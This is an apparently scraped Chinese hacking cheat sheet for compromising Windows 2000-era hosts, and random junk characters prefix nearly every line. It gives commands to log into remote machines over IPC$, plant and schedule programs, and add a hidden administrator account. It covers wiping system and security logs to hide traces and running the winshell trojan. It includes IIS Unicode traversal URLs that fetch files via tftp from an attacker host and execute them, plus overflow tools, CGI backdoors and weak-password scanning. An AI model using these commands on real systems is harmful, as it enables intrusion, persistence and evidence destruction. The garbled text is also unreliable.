网管和黑客都必须知道的命令
gtBnP~zT\B 常用的几条NET命令:
1;4]
HNI #''q :^EQ (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
rU{E} CX8tTbuFl (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
~
}<!ON; ^.d97rSm (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
l-N4RCt h 5$T>noD (查看远程主机时间) net time \\IP地址
J"x M[c2 x-e?94}^ (定时启动某个程序) at \\IP地址 02:18 readme.exe
RQ1`k,R= "^~>aVuXf (查看共享) net view \\IP地址
7D;g\{>M bLfbzkNV\1 (查看netbios工作组列表) nbtstat -A IP地址
"F*'UfOwrZ XU}|Ud562 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
UBUZ}ZIbN $:YJ<HvG< (这两条把自己增加到管理员组): net user 用户名 密码 /add
y'9
bs &m'ttUG? net localgroup Administrators 用户名 /add
R tR5ij1 3xJ_%AD\' (断开连接) net use \\IP地址\ipc$ /delete
?Q< o-o;B S&C 扫尾:
l&z)Q/>?pZ gGiLw5o, del C:\winnt\system32\logfiles\*.*
r# }`{C;+5 nj7wc9z4 del C:\winnt\ssytem32\config\*.evt
z'G~b[kG4n 2{!^"iW del C:\winnt\system32\dtclog\*.*
{ER%r'(4Z QX*HvT del C:\winnt\system32\*.log
=/k*w#j O!b > del C:\winnt\system32\*.txt
j]#-DIL ' Vp6=,P del C:\winnt\*.txt
4I>I 9Fl}"p[>L. del C:\winnt\*.log
;btH[a iV &DMKZMj<Q* 一、netsvc.exe
DO!?]" 31n5n 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
OOEmXb]8 1|L3} 2 netsvc /list \\IP地址
9M)N2+hkZ 0@9.h{s@ netsvc schedule \\IP地址 /query
O MEPF2: $Q[>v!!X netsvc \\IP地址 schedule /start
#!?5^O K#=)]qIk 二、OpenTelnet.exe
N{]|!# f!`,!dZgkd 远程启动主机的Telnet服务,并绑定端口到7878,例如:
EV:y} ])=k";76 OpenTelnet \\IP地址 用户名 密码 1 7878
}ug|&25D acWm+ 然后就可以telnet到主机的7878端口,进入DOS方式下:
Vo%MG.IPB y[*Bw)F\N telnet IP地址 7878
zS*X9|p Wmp,,H 三、winshell.exe
FDB^JH9d nj*B-M\p 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
H1PW/AW Z6}B}5@y p Path (查看winshell主程序的路径信息)
!s;+6Sy lE+v@Kb: b reBoot (重新启动机器)
6#+&_#9 '[]V%^F d shutDown (关闭机器)
4#?OxvH !b"#`O%` s Shell (执行后你就会看到可爱的“C:\>”)
E%M~:JuKd? 3_Su5~^ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
JLsy|}> 8v6YOG"b
q CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
Efsfuv M"OXNPkc 四、3389登陆器,GUI方式登录远程主机的
{89F* R{~Yh.)~ 五、elsave.exe
T!uK_ fiSc\C ~ 事件日志清除工具
C3af>L@} =GpO}t"> elsave -s \\IP地址 -l "application" -C
a;eV&~ Kc= &jCn elsave -s \\IP地址 -l "system" -C
tVUoUl .y {qsL^P elsave -s \\IP地址 -l "security" -C
T`{W$4XS uj$b/I>.' 执行后成功清除应用程序日志,系统日志,安全日志
f1;Pzr ,z1X{ 六、hbulot.exe
@|xcrEnP}B qlJP2Ig~ 开启win2kserver和winxp的3389服务
8CxC`*L( C7`FM@z hbulot [/r]
r%hnl9 }d2]QD#O 使用/r表示安装完成后自动重起目标使设置生效。
?d1H]f<M T?W`g>yM 七、nc.exe(netcat.exe)
3tMFJ ;*` @x">e][B 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
|1G /J[E U}7a;4? 想要连接到某处: nc [-options] hostname port[s] [ports] ...
}O<u V.kUFTCvf 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
![Z'jCpy =<I 90j~) 参数:
sm-RpZ&| "Y9
*rL -e prog 程序重定向,一旦连接,就执行 [危险!!]
Exox&T 'vT
XR_D -g gateway source-routing hop point[s], up to 8
xX`P-h>V`c (eI'%1kS< -G num source-routing pointer: 4, 8, 12, ...
N3Ub|$}q mh>)N" -h 帮助信息
5V\\w~&/ jE.U~D)2YF -i secs 延时的间隔
9u/ "bj r5z_{g -l 监听模式,用于入站连接
w{3
B 8V%(SV -n 指定数字的IP地址,不能用hostname
+Sk ; ]sJWiIe. -o file 记录16进制的传输
}tT"vCu aDuO!?Cm -p port 本地端口号
UUy|/z% }3cOZd_,t -r 任意指定本地及远程端口
zp>q$e40 _8 b)Xx@5 -s addr 本地源地址
pC0l}hnUg 0jO]+B I1 -u UDP模式
iCCY222: +5Yc/Qp -v 详细输出——用两个-v可得到更详细的内容
2~+_T |?0Cm|? -w secs timeout的时间
A,rgN;5fb 2-i>ymoOS -z 将输入输出关掉——用于扫描时
]Kb 八、TFTPD32.EXE
3!^5a%u ?fDF Rms 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
a?CV;9 2xH9O{ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
LUv>0G#L[ #L.fGTb 然后可以直接令文件运行:
%zQME6WELz Fn*clx< http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
l?v-9l M #*;(%\q} 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
NvWwj%6] 306C_M\$ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
CXGq>cQ=d ?y!0QAIXK 一、一 Xscan命令行运行参数说明:
Q@hx+aM #P$=P2o 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
a9qB8/Gg[ E^ _P 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
x]lv:m\)jT w1EYXe xscan -file <主机列表文件名> <检测项目> [其他选项]
S P)$K= =1fO"|L 其中<检测项目> 含义如下:
g<O*4
]= -Y%#z'^- -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
,/{mRw% a?K= -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
)s(J8J[b*L ,Khhu%$ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
MjNCn&c %>}6>nT# -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
$}r*WZ
M%+l21& -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
{.OBcx o0^'xVv [其他选项] 含义如下:
a(s}Ec${Z x F7C1g( -v: 显示详细扫描进度
:-7`Lfi@% H[ocIw -p: 跳过Ping不通的主机
di}YHMTx :)X?ML? -o: 跳过没有检测到开放端口的主机
q[1:h \2)a.2mAz -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10